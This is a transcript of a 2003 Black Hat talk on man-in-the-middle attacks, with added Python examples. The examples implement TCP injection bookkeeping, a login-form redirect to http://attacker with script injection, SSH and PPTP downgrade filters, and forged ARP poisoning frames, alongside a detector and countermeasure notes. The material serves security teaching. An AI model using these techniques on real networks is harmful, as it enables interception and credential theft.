
Man in the middle attacks Demos


Presentation Transcript


  1. Alberto Ornaghi <alor@antifork.org> Marco Valleri <naga@antifork.org>. Man in the middle attacks: Demos. Blackhat Conference - USA 2003

  2. The scenario: Client <-> Attacker <-> Server (the attacker sits in the path between the two)

  3. Once in the middle…
  • Injection
  • Key Manipulation
  • Downgrade attack
  • Filtering

  4. Injecting
  • Possibility to add packets to an already established connection (only possible in a full-duplex MITM)
  • The attacker can modify the sequence numbers and keep the connection synchronized while injecting packets
  • If the MITM attack is a "proxy attack" it is even easier to inject (there are two distinct connections)

  5. Injecting: Command injection
  • Useful in scenarios where one-time authentication is used (e.g. RSA token). In such scenarios sniffing the password is useless, but hijacking an already authenticated session is critical
  • Injection of commands to the server
  • Emulation of fake replies to the client

  6. Command Injection DEMO

  7. Key Manipulation
  • SSH v1
  • IPSEC
  • HTTPS

  8. Key Manipulation: SSH v1
  • Modification of the public key exchanged by server and client.
  Server -> MITM: KEY(rsa)        MITM -> Client: KEY(rsa) (the attacker's own key)
  Client -> MITM: Ekey[S-Key]     MITM -> Server: Ekey[S-Key] (re-encrypted for the server's key)
  Both ends and the MITM now hold S-KEY; every Eskey(M) is decrypted in the middle: D(E(M)).

  9. SSH v1 Attack DEMO

  10. Key Manipulation: IPSEC
  If two or more clients share the same "secret", each of them can impersonate the server with another client.
  Client <-> MiM: Diffie-Hellman exchange 1, authenticated by the pre-shared secret
  MiM <-> Server: Diffie-Hellman exchange 2, authenticated by the pre-shared secret
  MiM: de-crypt packet, re-crypt packet

  11. Key Manipulation: HTTPS
  We can create a fake certificate (eg: issued by VerySign) relying on browser misconfiguration or user carelessness.
  Client <-> MiM: fake cert.
  MiM <-> Server: real connection to the server

  12. HTTPS Attack DEMO

  13. Filtering
  • The attacker can modify the payload of the packets by recalculating the checksum
  • He/she can create filters on the fly
  • The length of the payload can also be changed, but only in full-duplex (in this case the seq has to be adjusted)
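The sequence-number bookkeeping from slides 4 and 13 and the checksum recalculation from slide 13, as an added Python example; this is not code from the slides or from ettercap. The addresses, ports and the "USER alice" payload are constructed for the walk-through, and nothing is sent on the wire.

```python
"""Added example (not code from the slides): what a full-duplex MITM must
track when it injects packets or changes a payload's length, plus the TCP
checksum recalculation a payload filter has to perform.  All segments are
constructed sample data."""
import socket
import struct


def tcp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """RFC 793 one's-complement checksum over the IPv4 pseudo-header and the
    TCP segment.  Over a segment whose checksum field is already correct the
    result is 0, which is how a receiver verifies it."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(segment)))
    data = pseudo + segment
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, payload: bytes,
                  flags: int = 0x18) -> bytes:
    """Minimal 20-byte TCP header (no options) with a valid checksum."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags,
                      65535, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def filter_payload(src_ip, dst_ip, segment: bytes, old: bytes, new: bytes) -> bytes:
    """Replace-filter on the payload, then recompute the checksum.  If
    len(new) != len(old) the caller must feed the size change into
    TcpMitmSync so later packets in this direction stay synchronised."""
    doff = (segment[12] >> 4) * 4
    hdr, payload = bytearray(segment[:doff]), segment[doff:].replace(old, new)
    hdr[16:18] = b"\x00\x00"
    hdr[16:18] = struct.pack("!H", tcp_checksum(src_ip, dst_ip, bytes(hdr) + payload))
    return bytes(hdr) + payload


class TcpMitmSync:
    """delta[d] = bytes the attacker has added (negative: removed) so far in
    direction d ("c2s" client->server, "s2c" server->client).  Later packets
    in that direction get seq += delta; packets in the opposite direction,
    which acknowledge those bytes, get ack -= delta."""

    def __init__(self):
        self.delta = {"c2s": 0, "s2c": 0}

    @staticmethod
    def _reverse(direction):
        return "s2c" if direction == "c2s" else "c2s"

    def rewrite(self, direction, seq, ack, old_len=0, new_len=0):
        """Translate a real packet.  old_len/new_len describe a payload-size
        change a filter applied to this very packet (0/0 = untouched)."""
        seq2 = (seq + self.delta[direction]) & 0xFFFFFFFF
        ack2 = (ack - self.delta[self._reverse(direction)]) & 0xFFFFFFFF
        self.delta[direction] += new_len - old_len
        return seq2, ack2

    def inject(self, direction, expected_seq, length):
        """Attacker-originated packet.  expected_seq is the next seq the
        receiver is waiting for in the *real* stream; returns the seq to put
        on the wire and records the injected bytes."""
        seq = (expected_seq + self.delta[direction]) & 0xFFFFFFFF
        self.delta[direction] += length
        return seq


def injection_walkthrough():
    """Constructed scenario: the client sends 12 bytes, the attacker injects a
    3-byte command, then the server's ACK and the client's next segment are
    translated.  Returns (injected_seq, ack_as_the_client_sees_it,
    client_next_seq_as_the_server_sees_it)."""
    sync = TcpMitmSync()
    sync.rewrite("c2s", 1000, 5000)                        # "USER alice\r\n", 12 bytes
    injected = sync.inject("c2s", 1012, 3)                 # attacker's "id\n"
    _, ack_to_client = sync.rewrite("s2c", 5000, 1015)     # server ACKs 1012 + 3
    seq_to_server, _ = sync.rewrite("c2s", 1012, 5000)     # client carries on
    return injected, ack_to_client, seq_to_server


if __name__ == "__main__":
    seg = build_segment("10.0.0.5", "10.0.0.9", 40000, 21, 1000, 5000, b"USER alice\r\n")
    seg2 = filter_payload("10.0.0.5", "10.0.0.9", seg, b"alice", b"mallory")
    print(tcp_checksum("10.0.0.5", "10.0.0.9", seg2), injection_walkthrough())
```

A half-duplex MITM cannot do this because it never sees the ACKs it would have to rewrite; a proxy-style MITM terminates two separate TCP connections and needs none of this bookkeeping, which is why the slide calls injection "even easier" there.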

  14. Filtering: Code filtering / injection
  • Insertion of malicious code into web pages or mail (javascript, trojans, viruses, etc.)
  • Modification on the fly of binary files during the download phase (viruses, backdoors, etc.)

  15. Binary Modification DEMO

  16. Filtering: HTTPS redirection
  Let's see an example (Client <-> MiM <-> Server, login/password):
  • (1) The client fetches an HTTP main page that contains an HTTPS login form; the MiM changes the form destination to http://attacker
  • (2) The HTTP POST (login\password) goes to the attacker in clear text
  • (3) The MiM answers with an auto-submitting hidden form carrying the right authentication data
  • (4) The client performs the real HTTPS authentication POST to the server
  • (5) Authenticated connection
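The response filter behind slides 14 and 16 in one added Python example (not code from the slides or from ettercap): inject a script into an HTML page, point the HTTPS login form at http://attacker, fix Content-Length so the client reads the rewritten body consistently, and build the auto-submitting form of step (3). The sample response, the attacker URLs and the payload are constructed; it handles plain (uncompressed, non-chunked) HTTP/1.x bodies only.

```python
"""Added example (not code from the slides): one filter covering slides 14
and 16 on a reassembled HTTP response.  Sample data is constructed."""
import html
import re

ATTACKER_FORM = b"http://attacker/login"                       # assumed attacker endpoint
INJECTED = b'<script src="http://attacker/x.js"></script>'     # assumed injected code

_BODY = (b"<html><body>"
         b'<form method="post" action="https://bank.example/login">'
         b'<input name="login"><input name="password" type="password">'
         b"</form></body></html>")
# constructed sample: an HTTP main page carrying an HTTPS login form
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                   b"Content-Length: %d\r\n\r\n" % len(_BODY)) + _BODY


def split_response(raw: bytes):
    """(head, body), or (None, None) if the header block is incomplete."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    return (head, body) if sep else (None, None)


def declared_length(head: bytes):
    m = re.search(rb"(?im)^content-length:[ \t]*(\d+)", head)
    return int(m.group(1)) if m else None


def filter_response(raw: bytes) -> bytes:
    head, body = split_response(raw)
    if head is None or b"text/html" not in head.lower():
        return raw                                    # not HTML: pass through untouched
    # slide 16: the HTTPS form now posts, in clear, to the attacker
    body = re.sub(rb'action="https://[^"]*"',
                  b'action="' + ATTACKER_FORM + b'"', body)
    # slide 14: code injection into the page
    body = body.replace(b"</body>", INJECTED + b"</body>", 1)
    # the body grew, so the header must say so (TCP seq numbers are the MITM's job)
    head = re.sub(rb"(?im)^content-length:[ \t]*\d+",
                  b"Content-Length: %d" % len(body), head)
    return head + b"\r\n\r\n" + body


def auto_submit_page(real_action: bytes, fields: dict) -> bytes:
    """Step (3): the page returned after capturing the POST, a hidden form with
    the real credentials that submits itself to the genuine HTTPS endpoint."""
    inputs = b"".join(
        b'<input type="hidden" name="%s" value="%s">'
        % (k, html.escape(v.decode(), quote=True).encode())
        for k, v in fields.items())
    return (b'<html><body onload="document.forms[0].submit()">'
            b'<form method="post" action="%s">%s</form></body></html>'
            % (real_action, inputs))
```

Nothing in the browser flags this: the main page was plain HTTP to begin with, and the final HTTPS POST is a genuine one, so the padlock the user eventually sees is real.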

  17. HTTPS Redirection Attack DEMO

  18. Downgrade Attacks
  • SSH v2
  • IPSEC
  • PPTP

  19. Downgrade Attacks: SSH v2 -> v1
  • Parameters exchanged by server and client at the beginning of a connection (the algorithms to be used later) can be substituted
  • The attacker can force the client to initialize an SSH1 connection instead of SSH2
  • The server's identification string tells the client what it supports: SSH-1.99 means the server supports ssh1 and ssh2; SSH-1.51 means the server supports ONLY ssh1
  • The attacker makes a filter to replace "1.99" with "1.51"
  • Possibility to circumvent known_hosts
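The banner filter from slide 19 together with the client-side decision it exploits, as an added Python example (not code from the slides or from ettercap). The banners are constructed samples; `allow_v1` stands in for a client's "protocol 1 permitted" setting.

```python
"""Added example (not code from the slides): the SSH identification-string
filter and what a client does with the result.  Sample banners are made up."""
import re


def downgrade_filter(banner: bytes) -> bytes:
    """SSH-1.99 -> SSH-1.51.  Same length, so the TCP stream needs no seq fix."""
    return banner.replace(b"SSH-1.99", b"SSH-1.51", 1)


def parse_banner(banner: bytes):
    """'SSH-protoversion-softwareversion ...' -> (major, minor, software)."""
    m = re.match(rb"SSH-(\d+)\.(\d+)-(\S+)", banner)
    if not m:
        raise ValueError("not an SSH identification string")
    return int(m.group(1)), int(m.group(2)), m.group(3).decode()


def server_protocols(banner: bytes) -> set:
    """1.99 advertises both protocols, 2.x only protocol 2, any other 1.x only protocol 1."""
    major, minor, _ = parse_banner(banner)
    if (major, minor) == (1, 99):
        return {1, 2}
    return {2} if major == 2 else {1}


def client_negotiates(banner: bytes, allow_v1: bool):
    """Protocol version the client will speak, or None if it refuses to connect.
    allow_v1=False models a client configured for protocol 2 only."""
    offered = server_protocols(banner)
    if 2 in offered:
        return 2
    return 1 if allow_v1 else None
```

The "circumvent known_hosts" point follows from this: in OpenSSH the protocol 1 host key (RSA1) is stored separately from the protocol 2 keys, so a downgraded client sees an unknown host it is asked to trust rather than a changed key it is warned about. A client that refuses protocol 1 (OpenSSH `Protocol 2`) simply fails to connect, which is the outcome you want.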

  20. SSH v2 Downgrade DEMO

  21. Downgrade Attacks: IPSEC failure
  • Block the key material exchanged on UDP port 500
  • The end points think that the other cannot start an IPSEC connection
  • If the client is configured in rollback mode, there is a good chance that the user will not notice that the connection is in clear text

  22. Downgrade Attacks: PPTP attack (1)
  • During the negotiation phase:
  • Force PAP authentication (almost always fails)
  • Force MS-CHAPv1 instead of MS-CHAPv2 (easier to crack)
  • Force no encryption
  • Force re-negotiation (clear-text terminate-ack)
  • Retrieve passwords from existing tunnels
  • Perform the previous attacks
  • Force a "password change" to obtain password hashes
  • Hashes can be used directly by a modified SMB or PPTP client
  • MS-CHAPv2 hashes are not useful (you can force v1)

  23. Downgrade Attacks: PPTP attack (2). Force PAP from CHAP
  LCP negotiation with the MITM between Server and Client (the slide's two message columns):
  req | auth | chap  ->  nak | auth | pap  ->  req | auth | pap  ->  ack | auth | pap
  req | auth | fake  ->  nak | auth | chap  ->  req | auth | pap  ->  ack | auth | pap
  We don't have to mess with GRE sequences...
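The first message column of slide 23 as an added Python example (not code from the slides or from ettercap): LCP Configure-Request / Configure-Nak packets are built and parsed, and the MITM answers the server's request for CHAP with a forged Configure-Nak proposing PAP. Reading the diagram as "the server requests CHAP, the attacker naks on the client's behalf" is an assumption of this model; the identifiers and the MS-CHAPv2 algorithm byte are constructed sample data.

```python
"""Added example (not code from the slides): LCP authentication-protocol
negotiation with a MITM forging the Configure-Nak.  Packets are constructed."""
import struct

CONF_REQ, CONF_ACK, CONF_NAK = 1, 2, 3     # LCP codes (RFC 1661)
OPT_AUTH = 3                               # Authentication-Protocol option
PAP, CHAP = 0xC023, 0xC223                 # PPP protocol numbers
MSCHAP_V2 = 0x81                           # CHAP algorithm byte (0x80 = MS-CHAPv1)


def auth_option(proto: int, algorithm=None) -> bytes:
    data = struct.pack("!H", proto) + (bytes([algorithm]) if algorithm is not None else b"")
    return bytes([OPT_AUTH, 2 + len(data)]) + data


def lcp(code: int, ident: int, options=()) -> bytes:
    body = b"".join(options)
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def parse_lcp(pkt: bytes):
    """-> (code, ident, [(option_type, option_data), ...])"""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    opts, i = [], 4
    while i < length:
        t, l = pkt[i], pkt[i + 1]
        opts.append((t, pkt[i + 2:i + l]))
        i += l
    return code, ident, opts


def requested_auth(pkt: bytes):
    """Protocol number carried in the Authentication-Protocol option, if any."""
    for t, data in parse_lcp(pkt)[2]:
        if t == OPT_AUTH:
            return struct.unpack("!H", data[:2])[0]
    return None


def mitm_filter(pkt_from_server: bytes):
    """If the server's Configure-Request asks for CHAP, answer it ourselves with
    a Configure-Nak proposing PAP (same identifier) and drop the request.
    Returns (reply_to_server, packet_to_forward_to_client)."""
    code, ident, _ = parse_lcp(pkt_from_server)
    if code == CONF_REQ and requested_auth(pkt_from_server) == CHAP:
        return lcp(CONF_NAK, ident, [auth_option(PAP)]), None
    return None, pkt_from_server


def downgrade_exchange():
    """Constructed run-through: server asks for MS-CHAPv2, gets the forged NAK,
    re-requests with PAP; returns the auth protocol that reaches the client."""
    req = lcp(CONF_REQ, 1, [auth_option(CHAP, MSCHAP_V2)])
    nak, forwarded = mitm_filter(req)
    if forwarded is not None:
        raise RuntimeError("request should have been swallowed")
    # a server that honours the NAK re-requests with the proposed protocol
    proposed = [bytes([OPT_AUTH, 2 + len(d)]) + d for t, d in parse_lcp(nak)[2]]
    _, forwarded = mitm_filter(lcp(CONF_REQ, 2, proposed))
    return requested_auth(forwarded)
```

Because LCP runs inside the PPTP control/GRE tunnel before any key is derived, nothing authenticates this NAK; the only defence is a server that refuses to fall back (require MS-CHAPv2, disable PAP and MS-CHAPv1), so the negotiation fails instead of degrading.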

  24. Downgrade Attacks: L2TP rollback
  • L2TP can use IPSec ESP as the transport layer (stronger than PPTP)
  • By default L2TP is tried before PPTP
  • Blocking ISAKMP packets results in an IPSec failure
  • The client then starts a request for a PPTP tunnel (rollback)
  • Now you can perform the previous PPTP attacks

  25. PPTP Attack DEMO

  26. MITM attacks. Different attacks in different scenarios:
  LOCAL AREA NETWORK: ARP poisoning, DNS spoofing, STP mangling, Port stealing
  FROM LOCAL TO REMOTE (through a gateway): ARP poisoning, DNS spoofing, DHCP spoofing, ICMP redirection, IRDP spoofing, route mangling
  REMOTE: DNS poisoning, traffic tunneling, route mangling
  WIRELESS: Access Point Reassociation

  27. MITM attacks: ARP poisoning
  • ARP is stateless (we all know how it works and what the problems are)
  • Some operating systems do not update an entry if it is not already in the cache, others accept only the first received reply (e.g. Solaris)
  • The attacker can forge a spoofed ICMP packet to force the host to make an ARP request. Immediately after the ICMP it sends the fake ARP reply
  • Useful on a switched LAN (the switch will not notice the attack)

  28. MITM attacks: ARP poisoning - countermeasures
  • YES - passive monitoring (arpwatch)
  • YES - active monitoring (ettercap)
  • YES - IDS (detect but not avoid)
  • YES - Static ARP entries (avoid it)
  • YES - Secure-ARP (public key auth)
  • NO - Port security on the switch
  • NO - anticap, antidote, middleware approach
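The forged reply from slide 27 and a passive monitor in the spirit of the arpwatch countermeasure on slide 28, as an added Python example (not code from the slides, ettercap or arpwatch). MAC and IP addresses are made up; the ICMP trick used to provoke an ARP request is not modelled, only the reply it sets up.

```python
"""Added example (not code from the slides): build/parse ARP-over-Ethernet
frames, forge the poisoning reply, and detect it passively.  Addresses are
constructed sample data."""
import socket
import struct

ETH_ARP = b"\x08\x06"
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def _fmt_mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II + ARP (RFC 826), 42 bytes.  The Ethernet source is the
    sender MAC, so nothing in the frame ties it to the attacker's real NIC."""
    eth = _mac(target_mac) + _mac(sender_mac) + ETH_ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + _mac(sender_mac) + socket.inet_aton(sender_ip)
           + _mac(target_mac) + socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    if len(frame) < 42 or frame[12:14] != ETH_ARP:
        return None
    return {"op": struct.unpack("!H", frame[20:22])[0],
            "sha": _fmt_mac(frame[22:28]), "spa": socket.inet_ntoa(frame[28:32]),
            "tha": _fmt_mac(frame[32:38]), "tpa": socket.inet_ntoa(frame[38:42])}


def poison(victim_mac, victim_ip, gateway_ip, attacker_mac) -> bytes:
    """The forged reply: 'gateway_ip is at attacker_mac', addressed to the victim."""
    return build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)


class ArpWatch:
    """Passive monitor: learn ip -> mac from every ARP packet on the wire and
    flag an IP whose MAC changes (arpwatch calls this a 'flip flop')."""

    def __init__(self):
        self.table, self.alerts = {}, []

    def observe(self, frame: bytes):
        p = parse_arp(frame)
        if p is None or p["spa"] == "0.0.0.0":       # ignore non-ARP and probes
            return None
        old = self.table.get(p["spa"])
        if old is not None and old != p["sha"]:
            self.alerts.append((p["spa"], old, p["sha"]))
        self.table[p["spa"]] = p["sha"]
        return p


def scenario():
    """Constructed run: one legitimate reply from the gateway, then the poison."""
    gw_ip, gw_mac = "10.0.0.1", "00:00:5e:00:01:01"
    victim_ip, victim_mac = "10.0.0.5", "00:11:22:33:44:55"
    attacker_mac = "de:ad:be:ef:00:66"
    w = ArpWatch()
    w.observe(build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip))
    w.observe(poison(victim_mac, victim_ip, gw_ip, attacker_mac))
    return w.alerts
```

The monitor can only raise an alert (the slide's "detect but not avoid"); the victim's cache is already poisoned by the time the flip-flop is seen, which is why static entries, not detection, are what actually stops this.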

  29. ARP Poisoning DEMO (all we have done until now…)

  30. ARP Poisoning: Antidote kernel patch
  • http://www.securityfocus.com/archive/1/299929
  • "Kernel will send ARP request to test if there is a host at old MAC address. If such response is received it lets us know that one IP pretends to have several MAC addresses at one moment, that is probably caused by ARP spoof attack."
  • We can defeat this protection when the ARP entry is not yet in the cache: our spoofed reply is accepted first, and the real MAC address is the one that gets banned

  31. Antidote Attack DEMO

  32. MITM attack: Port stealing
  • The attacker sends many layer 2 packets with: source address equal to the victim host's address, destination address equal to its own MAC address
  • The attacker has now "stolen" the victim host's port
  • When the attacker receives a packet for one of the victims it generates a broadcast ARP request for the victim's IP address
  • When the attacker receives the ARP reply from the victim, the victim's port has been restored to the original binding state
  • The attacker can now forward the packet and restart the stealing process
  • Possibility to circumvent statically mapped ARP entries
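One stealing round from slide 32 against a learning switch, as an added Python example (not code from the slides or from ettercap). The switch model (a CAM table learned from source MACs, unknown and broadcast destinations flooded) and the MAC addresses and port numbers are constructed for the illustration.

```python
"""Added example (not code from the slides): port stealing against a minimal
learning switch.  Ports and MAC addresses are constructed sample data."""


class LearningSwitch:
    """CAM table mac -> port, learned from frame source addresses.
    forward() returns the egress port, or None when the frame is flooded."""
    BROADCAST = "ff:ff:ff:ff:ff:ff"

    def __init__(self):
        self.cam = {}

    def forward(self, in_port, src_mac, dst_mac):
        self.cam[src_mac] = in_port              # learning happens on every frame
        if dst_mac == self.BROADCAST:
            return None
        return self.cam.get(dst_mac)


def steal_port(switch, attacker_port, attacker_mac, victim_mac, burst=3):
    """Frames with src = victim, dst = attacker.  They never reach the victim
    (the destination is the attacker's own MAC) but the switch relearns
    victim_mac on the attacker's port."""
    for _ in range(burst):
        switch.forward(attacker_port, victim_mac, attacker_mac)


def port_stealing_round():
    """Constructed run: where a gateway -> victim frame lands before the
    steal, during it, and after the attacker restores the binding."""
    gw, victim, attacker = "00:00:5e:00:01:01", "00:11:22:33:44:55", "de:ad:be:ef:00:66"
    sw = LearningSwitch()
    sw.forward(1, gw, victim)                     # normal traffic: ports get learned
    sw.forward(2, victim, gw)
    before = sw.forward(1, gw, victim)            # delivered to the victim on port 2
    steal_port(sw, 3, attacker, victim)
    stolen = sw.forward(1, gw, victim)            # now delivered to the attacker on port 3
    # restore: broadcast ARP request for the victim's IP, the victim's reply relearns port 2
    sw.forward(3, attacker, LearningSwitch.BROADCAST)
    sw.forward(2, victim, attacker)
    restored = sw.forward(3, attacker, victim)    # the forwarded copy reaches the victim
    return before, stolen, restored
```

Static ARP entries do nothing here because the victim's IP-to-MAC mapping is never touched; only the switch's MAC-to-port table is, which is why slide 33 lists port security (limiting which MACs a port may source) as the countermeasure that works.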

  33. MITM attack: Port stealing - countermeasures
  • YES - port security on the switch
  • NO - static ARP

  34. Port Stealing DEMO

  35. Q & A. Alberto Ornaghi <alor@antifork.org> Marco Valleri <naga@antifork.org>
